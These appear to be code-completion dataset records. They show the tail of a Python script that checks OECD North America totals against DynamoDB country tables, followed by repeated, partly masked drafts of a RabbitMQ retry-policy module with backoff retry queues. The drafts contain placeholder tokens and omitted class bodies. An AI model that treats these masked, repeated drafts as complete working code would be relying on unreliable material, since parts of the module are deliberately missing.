FUNCTIONS ############################################\n\n# Converts the label of a dict into its code key, returns None if not a label\ndef convert_dict_label_to_code_key(label, encodings_dict):\n # Get the key of the label if the label exists in the dict as a value\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).index(label)]\n else:\n return None\n\n# Check if a commodity code + variable is common across all 4 tables, return true if it is\ndef is_common_variable(commodity_code, variable):\n return (has_commodity_and_variable(na_table, commodity_code, variable) and\n has_commodity_and_variable(canada_table, commodity_code, variable) and\n has_commodity_and_variable(usa_table, commodity_code, variable) and\n has_commodity_and_variable(mexico_table, commodity_code, variable))\n\n# Check if a table has data for commodity code + variable (ie. scan table), returns true if at least 1 item is found\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(\n FilterExpression = Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )\n return response['Count'] > 0\n\n# Retrieves and outputs table data based on commodity and variable and analyze for NA definition\ndef output_table(commodity_code, variable, variable_encodings_dict, commodity_encodings_dict):\n # Bring in globals to modify\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n\n # Init local accumulators\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n\n # Print table headers: common variable (for commodity code) across all 4 tables, and table column names\n print(f\"Variable: {variable_encodings_dict[variable]}\")\n print(OUTPUT_FORMAT.format(\"Year\", \"North America\", \"Canada\", \"USA\", \"Mexico\", \"CAN+USA\", \"CAN+USA+MEX\", \"NA Defn\"))\n\n # Retrieve all data, from all years (ie. the items from the scan)\n na_scan_data = na_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n can_scan_data = canada_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n usa_scan_data = usa_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n mex_scan_data = mexico_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n\n # Sort each scan data by key\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n\n # Analyze data\n for year in YEAR_RANGE:\n # For each relevant year, calculate total value using multiplication factor\n i = year - 2010\n na_value = na_scan_data[i]['value'] * (10**na_scan_data[i]['mfactor'])\n can_value = can_scan_data[i]['value'] * (10**can_scan_data[i]['mfactor'])\n usa_value = usa_scan_data[i]['value'] * (10**usa_scan_data[i]['mfactor'])\n mex_value = mex_scan_data[i]['value'] * (10**mex_scan_data[i]['mfactor'])\n\n # Calc temp sums for the CAN+USA and CAN+USA+MEX columns\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n\n # Determine OECD def of NA, by checking if the temp calc sums from scan data calc values are equivalent to CAN+USA sum, CAN+USA+MEX sum, or Neither\n # Note: accumulate the #of accurate NA def 'hits'\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n\n # Print table row for current year\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value, mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n\n # Determine the NA definition for this variable based on #of 'hits' per year\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = \"CAN+USA\"\n elif temp_can_usa_mex == max_hits:\n na_defn = \"CAN+USA+MEX\"\n else:\n na_defn = \"Neither\"\n\n print(f\"North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither\")\n print(f\"Therefore we can conclude North America = {na_defn}\\n\")\n\n # Accumulate global totals using temp local accumulators for NA definition 'hits'\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n# Sorter Helper for queried data by year\ndef data_sort(elem):\n return elem['year']\n\n###################################################################################################\n\nmain()\n",
"step-ids": [
5,
6,
7,
9,
10
]
}
|
[
5,
6,
7,
9,
10
] |
<|reserved_special_token_0|>
class LimitedRetriesPolicy(BaseRetryPolicy):
<|reserved_special_token_0|>
def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',
**kwargs):
"""
:param Consumer consumer: message consumer instance
:param Iterable[int] retry_delays: Immutable list of retry backoff delays in
seconds. Message is sent to dlx when this list is exhausted.
e.g ``(1, 5, 10, 60, 5 * 60)``
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert len(retry_delays) > 0
super(LimitedRetriesPolicy, self).__init__(consumer,
retry_queue_suffix, **kwargs)
self.retry_delays = retry_delays
def retry(self, envelope):
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
The death count is used as an index for `retry_delays` list. Where each
item in the list represents a retry delay in seconds.
The message will be rejected if the death count exceeded the length of
`retry_delays` list.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
if death_count < len(self.retry_delays):
delay = self.retry_delays[death_count]
retry_queue_name = self.declare_retry_queue(delay)
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(exchange='', routing_key=
retry_queue_name, properties=envelope.properties, body=
envelope.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning(
'Retry handling message [{}] after {}s; death count: {}'.
format(envelope.message_id, delay, death_count + 1))
else:
logger.warning('Message [{}] exceeded retry limit; death count: {}'
.format(envelope.message_id, death_count + 1))
self.consumer.channel.basic_reject(envelope.delivery_tag,
requeue=False)
logger.error('Message [{}] is rejected'.format(envelope.message_id)
)
class FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):
"""Fixed delay unlimited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
unlimited retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=
consumer, initial_delay=delay, max_delay=delay,
delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,
**kwargs)
class FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):
"""Fixed delay limited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
limited number of retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds.
:attr:`retries_limit`: retries limit count.
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=
'retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param int retries_limit: retries limit count
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert retries_limit > 0
retry_delays = tuple([delay] * retries_limit)
super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=
consumer, retry_delays=retry_delays, retry_queue_suffix=
retry_queue_suffix, **kwargs)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class UnlimitedRetriesPolicy(BaseRetryPolicy):
<|reserved_special_token_0|>
def __init__(self, consumer, initial_delay, max_delay,
delay_incremented_by, retry_queue_suffix='retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int initial_delay: `initial_delay` is the initial/first backoff delay
in seconds.
:param int max_delay: `max_delay` is the final/maximum backoff delay in seconds
that should net be exceeded. When exceeded, this max is used.
:param int delay_incremented_by: `delay_incremented_by` is number of seconds
the backoff should be incremented by after each death.
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(UnlimitedRetriesPolicy, self).__init__(consumer,
retry_queue_suffix, **kwargs)
assert initial_delay >= 0
assert delay_incremented_by >= 0
assert max_delay >= initial_delay
self.initial_delay = initial_delay
self.max_delay = max_delay
self.delay_incremented_by = delay_incremented_by
def retry(self, envelope):
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
delay = self.initial_delay + death_count * self.delay_incremented_by
if delay > self.max_delay:
delay = self.max_delay
retry_queue_name = self.declare_retry_queue(delay)
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(exchange='', routing_key=
retry_queue_name, properties=envelope.properties, body=envelope
.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning('Retry handling message [{}] after {}s; death count: {}'
.format(envelope.message_id, delay, death_count + 1))
class LimitedRetriesPolicy(BaseRetryPolicy):
"""Limited Retries Policy.
This is an implementation of :class:`.RetryPolicy` which does incremental backoff,
limited number of retries.
:attr:`consumer`: message consumer instance
:attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message
is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',
**kwargs):
"""
:param Consumer consumer: message consumer instance
:param Iterable[int] retry_delays: Immutable list of retry backoff delays in
seconds. Message is sent to dlx when this list is exhausted.
e.g ``(1, 5, 10, 60, 5 * 60)``
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert len(retry_delays) > 0
super(LimitedRetriesPolicy, self).__init__(consumer,
retry_queue_suffix, **kwargs)
self.retry_delays = retry_delays
def retry(self, envelope):
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
The death count is used as an index for `retry_delays` list. Where each
item in the list represents a retry delay in seconds.
The message will be rejected if the death count exceeded the length of
`retry_delays` list.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
if death_count < len(self.retry_delays):
delay = self.retry_delays[death_count]
retry_queue_name = self.declare_retry_queue(delay)
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(exchange='', routing_key=
retry_queue_name, properties=envelope.properties, body=
envelope.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning(
'Retry handling message [{}] after {}s; death count: {}'.
format(envelope.message_id, delay, death_count + 1))
else:
logger.warning('Message [{}] exceeded retry limit; death count: {}'
.format(envelope.message_id, death_count + 1))
self.consumer.channel.basic_reject(envelope.delivery_tag,
requeue=False)
logger.error('Message [{}] is rejected'.format(envelope.message_id)
)
class FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):
"""Fixed delay unlimited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
unlimited retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=
consumer, initial_delay=delay, max_delay=delay,
delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,
**kwargs)
class FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):
"""Fixed delay limited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
limited number of retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds.
:attr:`retries_limit`: retries limit count.
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=
'retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param int retries_limit: retries limit count
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert retries_limit > 0
retry_delays = tuple([delay] * retries_limit)
super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=
consumer, retry_delays=retry_delays, retry_queue_suffix=
retry_queue_suffix, **kwargs)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BaseRetryPolicy(RetryPolicy):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class UnlimitedRetriesPolicy(BaseRetryPolicy):
"""Unlimited Retries Policy.
This is an implementation of :class:`.RetryPolicy` which does incremental backoff,
unlimited retries.
:attr:`initial_delay`: is the initial/first backoff delay in seconds
:attr:`delay_incremented_by`: is number of seconds the backoff should be incremented
by after each death
:attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be
exceeded
"""
def __init__(self, consumer, initial_delay, max_delay,
delay_incremented_by, retry_queue_suffix='retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int initial_delay: `initial_delay` is the initial/first backoff delay
in seconds.
:param int max_delay: `max_delay` is the final/maximum backoff delay in seconds
that should net be exceeded. When exceeded, this max is used.
:param int delay_incremented_by: `delay_incremented_by` is number of seconds
the backoff should be incremented by after each death.
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(UnlimitedRetriesPolicy, self).__init__(consumer,
retry_queue_suffix, **kwargs)
assert initial_delay >= 0
assert delay_incremented_by >= 0
assert max_delay >= initial_delay
self.initial_delay = initial_delay
self.max_delay = max_delay
self.delay_incremented_by = delay_incremented_by
def retry(self, envelope):
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
delay = self.initial_delay + death_count * self.delay_incremented_by
if delay > self.max_delay:
delay = self.max_delay
retry_queue_name = self.declare_retry_queue(delay)
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(exchange='', routing_key=
retry_queue_name, properties=envelope.properties, body=envelope
.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning('Retry handling message [{}] after {}s; death count: {}'
.format(envelope.message_id, delay, death_count + 1))
class LimitedRetriesPolicy(BaseRetryPolicy):
"""Limited Retries Policy.
This is an implementation of :class:`.RetryPolicy` which does incremental backoff,
limited number of retries.
:attr:`consumer`: message consumer instance
:attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message
is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',
**kwargs):
"""
:param Consumer consumer: message consumer instance
:param Iterable[int] retry_delays: Immutable list of retry backoff delays in
seconds. Message is sent to dlx when this list is exhausted.
e.g ``(1, 5, 10, 60, 5 * 60)``
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert len(retry_delays) > 0
super(LimitedRetriesPolicy, self).__init__(consumer,
retry_queue_suffix, **kwargs)
self.retry_delays = retry_delays
def retry(self, envelope):
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
The death count is used as an index for `retry_delays` list. Where each
item in the list represents a retry delay in seconds.
The message will be rejected if the death count exceeded the length of
`retry_delays` list.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
if death_count < len(self.retry_delays):
delay = self.retry_delays[death_count]
retry_queue_name = self.declare_retry_queue(delay)
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(exchange='', routing_key=
retry_queue_name, properties=envelope.properties, body=
envelope.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning(
'Retry handling message [{}] after {}s; death count: {}'.
format(envelope.message_id, delay, death_count + 1))
else:
logger.warning('Message [{}] exceeded retry limit; death count: {}'
.format(envelope.message_id, death_count + 1))
self.consumer.channel.basic_reject(envelope.delivery_tag,
requeue=False)
logger.error('Message [{}] is rejected'.format(envelope.message_id)
)
class FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):
"""Fixed delay unlimited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
unlimited retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=
consumer, initial_delay=delay, max_delay=delay,
delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,
**kwargs)
class FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):
"""Fixed delay limited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
limited number of retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds.
:attr:`retries_limit`: retries limit count.
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=
'retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param int retries_limit: retries limit count
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert retries_limit > 0
retry_delays = tuple([delay] * retries_limit)
super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=
consumer, retry_delays=retry_delays, retry_queue_suffix=
retry_queue_suffix, **kwargs)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RetryPolicy(object):
<|reserved_special_token_0|>
def __init__(self, **kwargs):
super(RetryPolicy, self).__init__()
def retry(self, envelope):
"""This method is implemented by the subclass."""
raise NotImplementedError()
class BaseRetryPolicy(RetryPolicy):
"""Base retry policy class for :class:`.UnlimitedRetriesPolicy` and
:class:`.LimitedRetriesPolicy`.
It has implementation for geting mesage death count and retry queue creation.
"""
def __init__(self, consumer, retry_queue_suffix='retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param str retry_queue_suffix: Suffix used when creating retry queues. Retry
queue names are constructed in this form "queue_name.<suffix>.<delay>".
Optional, default to ``retry``
"""
super(BaseRetryPolicy, self).__init__(**kwargs)
retry_queue_suffix = retry_queue_suffix.strip()
self.consumer = consumer
assert len(retry_queue_suffix) > 0
self.retry_queue_suffix = retry_queue_suffix
self.min_retry_queue_ttl = 20 * 1000
def set_original_delivery_info_header(self, envelope):
"""Save original message delivery infomation in a header."""
if not envelope.get_header('x-original-delivery-info'):
original_delivery_info = {'consumer_tag': envelope.
delivery_info.consumer_tag, 'delivery_tag': envelope.
delivery_info.delivery_tag, 'redelivered': envelope.
delivery_info.redelivered, 'exchange': envelope.
delivery_info.exchange, 'routing_key': envelope.
delivery_info.routing_key}
envelope.set_header('x-original-delivery-info',
original_delivery_info)
def get_death_count(self, envelope):
"""Return the death count of a message by examining "x-death" header.
:param Envelope envelope: Message envelope
:return int: death count
"""
death_header = envelope.get_header('x-death')
if death_header is None:
return 0
count = 0
for death in death_header:
if not death['queue'].startswith(self.consumer.queue_name):
continue
count += death.get('count', 1)
return count
def declare_retry_queue(self, delay):
"""Declare a retry queue for the provided delay.
Each different delay has a different queue where all retry messages with the
same delay will be sent to till they expire and get sent back to the original
queue for handling retry. The queue is declared with a TTL and automatically
gets deleted. The queue TTL is equal to the provided delay. The retry
queue's dead letter exchange is (default) direct exchange and the dead letter
routing key is the original queue name where the messages originally
came from. The messages will be sent back to the original queue when they
reach their TTL, for handling retry.
The retry queue is redeclared before every a new message is sent to it.
Redeclaration resets the queue's TTL, preventing it from being destroyed.
:param int delay: Retry delay in seconds
:return: retry queue name
:rtype: str
"""
delay_in_ms = int(delay * 1000)
retry_queue_name = '{}.{}.{}'.format(self.consumer.queue_name, self
.retry_queue_suffix, delay_in_ms)
queue_ttl = delay_in_ms * 2
if queue_ttl < self.min_retry_queue_ttl:
queue_ttl = self.min_retry_queue_ttl
self.consumer.channel.queue_declare(callback=None, queue=
retry_queue_name, durable=self.consumer.durable, nowait=True,
arguments={'x-dead-letter-exchange': '',
'x-dead-letter-routing-key': self.consumer.queue_name,
'x-message-ttl': delay_in_ms, 'x-expires': queue_ttl})
logger.warning('Retry queue "{}" is created/redeclared'.format(
retry_queue_name))
return retry_queue_name
class UnlimitedRetriesPolicy(BaseRetryPolicy):
"""Unlimited Retries Policy.
This is an implementation of :class:`.RetryPolicy` which does incremental backoff,
unlimited retries.
:attr:`initial_delay`: is the initial/first backoff delay in seconds
:attr:`delay_incremented_by`: is number of seconds the backoff should be incremented
by after each death
:attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be
exceeded
"""
def __init__(self, consumer, initial_delay, max_delay,
delay_incremented_by, retry_queue_suffix='retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int initial_delay: `initial_delay` is the initial/first backoff delay
in seconds.
:param int max_delay: `max_delay` is the final/maximum backoff delay in seconds
that should net be exceeded. When exceeded, this max is used.
:param int delay_incremented_by: `delay_incremented_by` is number of seconds
the backoff should be incremented by after each death.
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(UnlimitedRetriesPolicy, self).__init__(consumer,
retry_queue_suffix, **kwargs)
assert initial_delay >= 0
assert delay_incremented_by >= 0
assert max_delay >= initial_delay
self.initial_delay = initial_delay
self.max_delay = max_delay
self.delay_incremented_by = delay_incremented_by
def retry(self, envelope):
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
delay = self.initial_delay + death_count * self.delay_incremented_by
if delay > self.max_delay:
delay = self.max_delay
retry_queue_name = self.declare_retry_queue(delay)
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(exchange='', routing_key=
retry_queue_name, properties=envelope.properties, body=envelope
.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning('Retry handling message [{}] after {}s; death count: {}'
.format(envelope.message_id, delay, death_count + 1))
class LimitedRetriesPolicy(BaseRetryPolicy):
"""Limited Retries Policy.
This is an implementation of :class:`.RetryPolicy` which does incremental backoff,
limited number of retries.
:attr:`consumer`: message consumer instance
:attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message
is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',
**kwargs):
"""
:param Consumer consumer: message consumer instance
:param Iterable[int] retry_delays: Immutable list of retry backoff delays in
seconds. Message is sent to dlx when this list is exhausted.
e.g ``(1, 5, 10, 60, 5 * 60)``
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert len(retry_delays) > 0
super(LimitedRetriesPolicy, self).__init__(consumer,
retry_queue_suffix, **kwargs)
self.retry_delays = retry_delays
def retry(self, envelope):
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
The death count is used as an index for `retry_delays` list. Where each
item in the list represents a retry delay in seconds.
The message will be rejected if the death count exceeded the length of
`retry_delays` list.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
if death_count < len(self.retry_delays):
delay = self.retry_delays[death_count]
retry_queue_name = self.declare_retry_queue(delay)
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(exchange='', routing_key=
retry_queue_name, properties=envelope.properties, body=
envelope.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning(
'Retry handling message [{}] after {}s; death count: {}'.
format(envelope.message_id, delay, death_count + 1))
else:
logger.warning('Message [{}] exceeded retry limit; death count: {}'
.format(envelope.message_id, death_count + 1))
self.consumer.channel.basic_reject(envelope.delivery_tag,
requeue=False)
logger.error('Message [{}] is rejected'.format(envelope.message_id)
)
class FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):
"""Fixed delay unlimited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
unlimited retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=
consumer, initial_delay=delay, max_delay=delay,
delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,
**kwargs)
class FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):
"""Fixed delay limited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
limited number of retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds.
:attr:`retries_limit`: retries limit count.
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=
'retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param int retries_limit: retries limit count
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert retries_limit > 0
retry_delays = tuple([delay] * retries_limit)
super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=
consumer, retry_delays=retry_delays, retry_queue_suffix=
retry_queue_suffix, **kwargs)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""
Noting is perfect, errors and timeouts may happen, and when such failures happen, the
consumer has to decide what to do with that. By default, the consumer would reject the
envelope (RabbitMQ message) when a failure happens. However, errors and timeouts
issues, unless there is a software bug, usually solved with retries. Just like the
routing, the consumer doesn't make the retry decision itself, the consumer delegates
it to a retry policy. Retry policy defines how the retry is performed. Retries
usually happens with back-offs to avoid worsening the situation by hammering other
services with more requests, especially if it was a timeout issue. The consumer can be
configured to use a retry policy by calling :meth:`.Consumer.set_retry_policy`, passing
an instance of :class:`.RetryPolicy`. When a retry policy is set, the consumer won't
reject messages, but rather, it send them to the retry policy to deal with the
situation by invoking :meth:`.RetryPolicy.retry` method. Based on it's implementation,
The retry policy decides how to do retries.
There are 4 different retry policies available:
1. :class:`.UnlimitedRetriesPolicy`, Unlimited retries policy
2. :class:`.LimitedRetriesPolicy`, Limited retries policy
3. :class:`.FixedDelayUnlimitedRetriesPolicy`, Fixed delay unlimited retries policy
4. :class:`.FixedDelayLimitedRetriesPolicy`, Fixed delay limited retries policy
Custom retry policies can be created by implementing the base class
:class:`.RetryPolicy`
"""
import logging
logger = logging.getLogger(__name__)
class RetryPolicy(object):
"""Base class for retry policies.
Subclasses MUST implement :meth:`retry` method.
"""
def __init__(self, **kwargs):
# type: (RetryPolicy) -> None
super(RetryPolicy, self).__init__()
def retry(self, envelope):
# type: (RetryPolicy, Envelope) -> None
"""This method is implemented by the subclass."""
raise NotImplementedError()
class BaseRetryPolicy(RetryPolicy):
"""Base retry policy class for :class:`.UnlimitedRetriesPolicy` and
:class:`.LimitedRetriesPolicy`.
It has implementation for geting mesage death count and retry queue creation.
"""
def __init__(self, consumer, retry_queue_suffix='retry', **kwargs):
# type: (BaseRetryPolicy, Consumer, str) -> None
"""
:param Consumer consumer: message consumer instance
:param str retry_queue_suffix: Suffix used when creating retry queues. Retry
queue names are constructed in this form "queue_name.<suffix>.<delay>".
Optional, default to ``retry``
"""
super(BaseRetryPolicy, self).__init__(**kwargs)
retry_queue_suffix = retry_queue_suffix.strip()
self.consumer = consumer
assert len(retry_queue_suffix) > 0
self.retry_queue_suffix = retry_queue_suffix
# To avoid frequent retry queue create and destroy for low retry delays
self.min_retry_queue_ttl = 20 * 1000 # 20 seconds
def set_original_delivery_info_header(self, envelope):
# type: (BaseRetryPolicy, Envelope) -> None
"""Save original message delivery infomation in a header."""
if not envelope.get_header('x-original-delivery-info'):
original_delivery_info = {
'consumer_tag': envelope.delivery_info.consumer_tag,
'delivery_tag': envelope.delivery_info.delivery_tag,
'redelivered': envelope.delivery_info.redelivered,
'exchange': envelope.delivery_info.exchange,
'routing_key': envelope.delivery_info.routing_key
}
envelope.set_header('x-original-delivery-info',
original_delivery_info)
def get_death_count(self, envelope):
# type: (BaseRetryPolicy, Envelope) -> int
"""Return the death count of a message by examining "x-death" header.
:param Envelope envelope: Message envelope
:return int: death count
"""
death_header = envelope.get_header('x-death')
if death_header is None:
return 0
count = 0
for death in death_header:
if not death['queue'].startswith(self.consumer.queue_name):
continue
count += death.get('count', 1)
return count
def declare_retry_queue(self, delay):
# type: (BaseRetryPolicy, int) -> str
"""Declare a retry queue for the provided delay.
Each different delay has a different queue where all retry messages with the
same delay will be sent to till they expire and get sent back to the original
queue for handling retry. The queue is declared with a TTL and automatically
gets deleted. The queue TTL is equal to the provided delay. The retry
queue's dead letter exchange is (default) direct exchange and the dead letter
routing key is the original queue name where the messages originally
came from. The messages will be sent back to the original queue when they
reach their TTL, for handling retry.
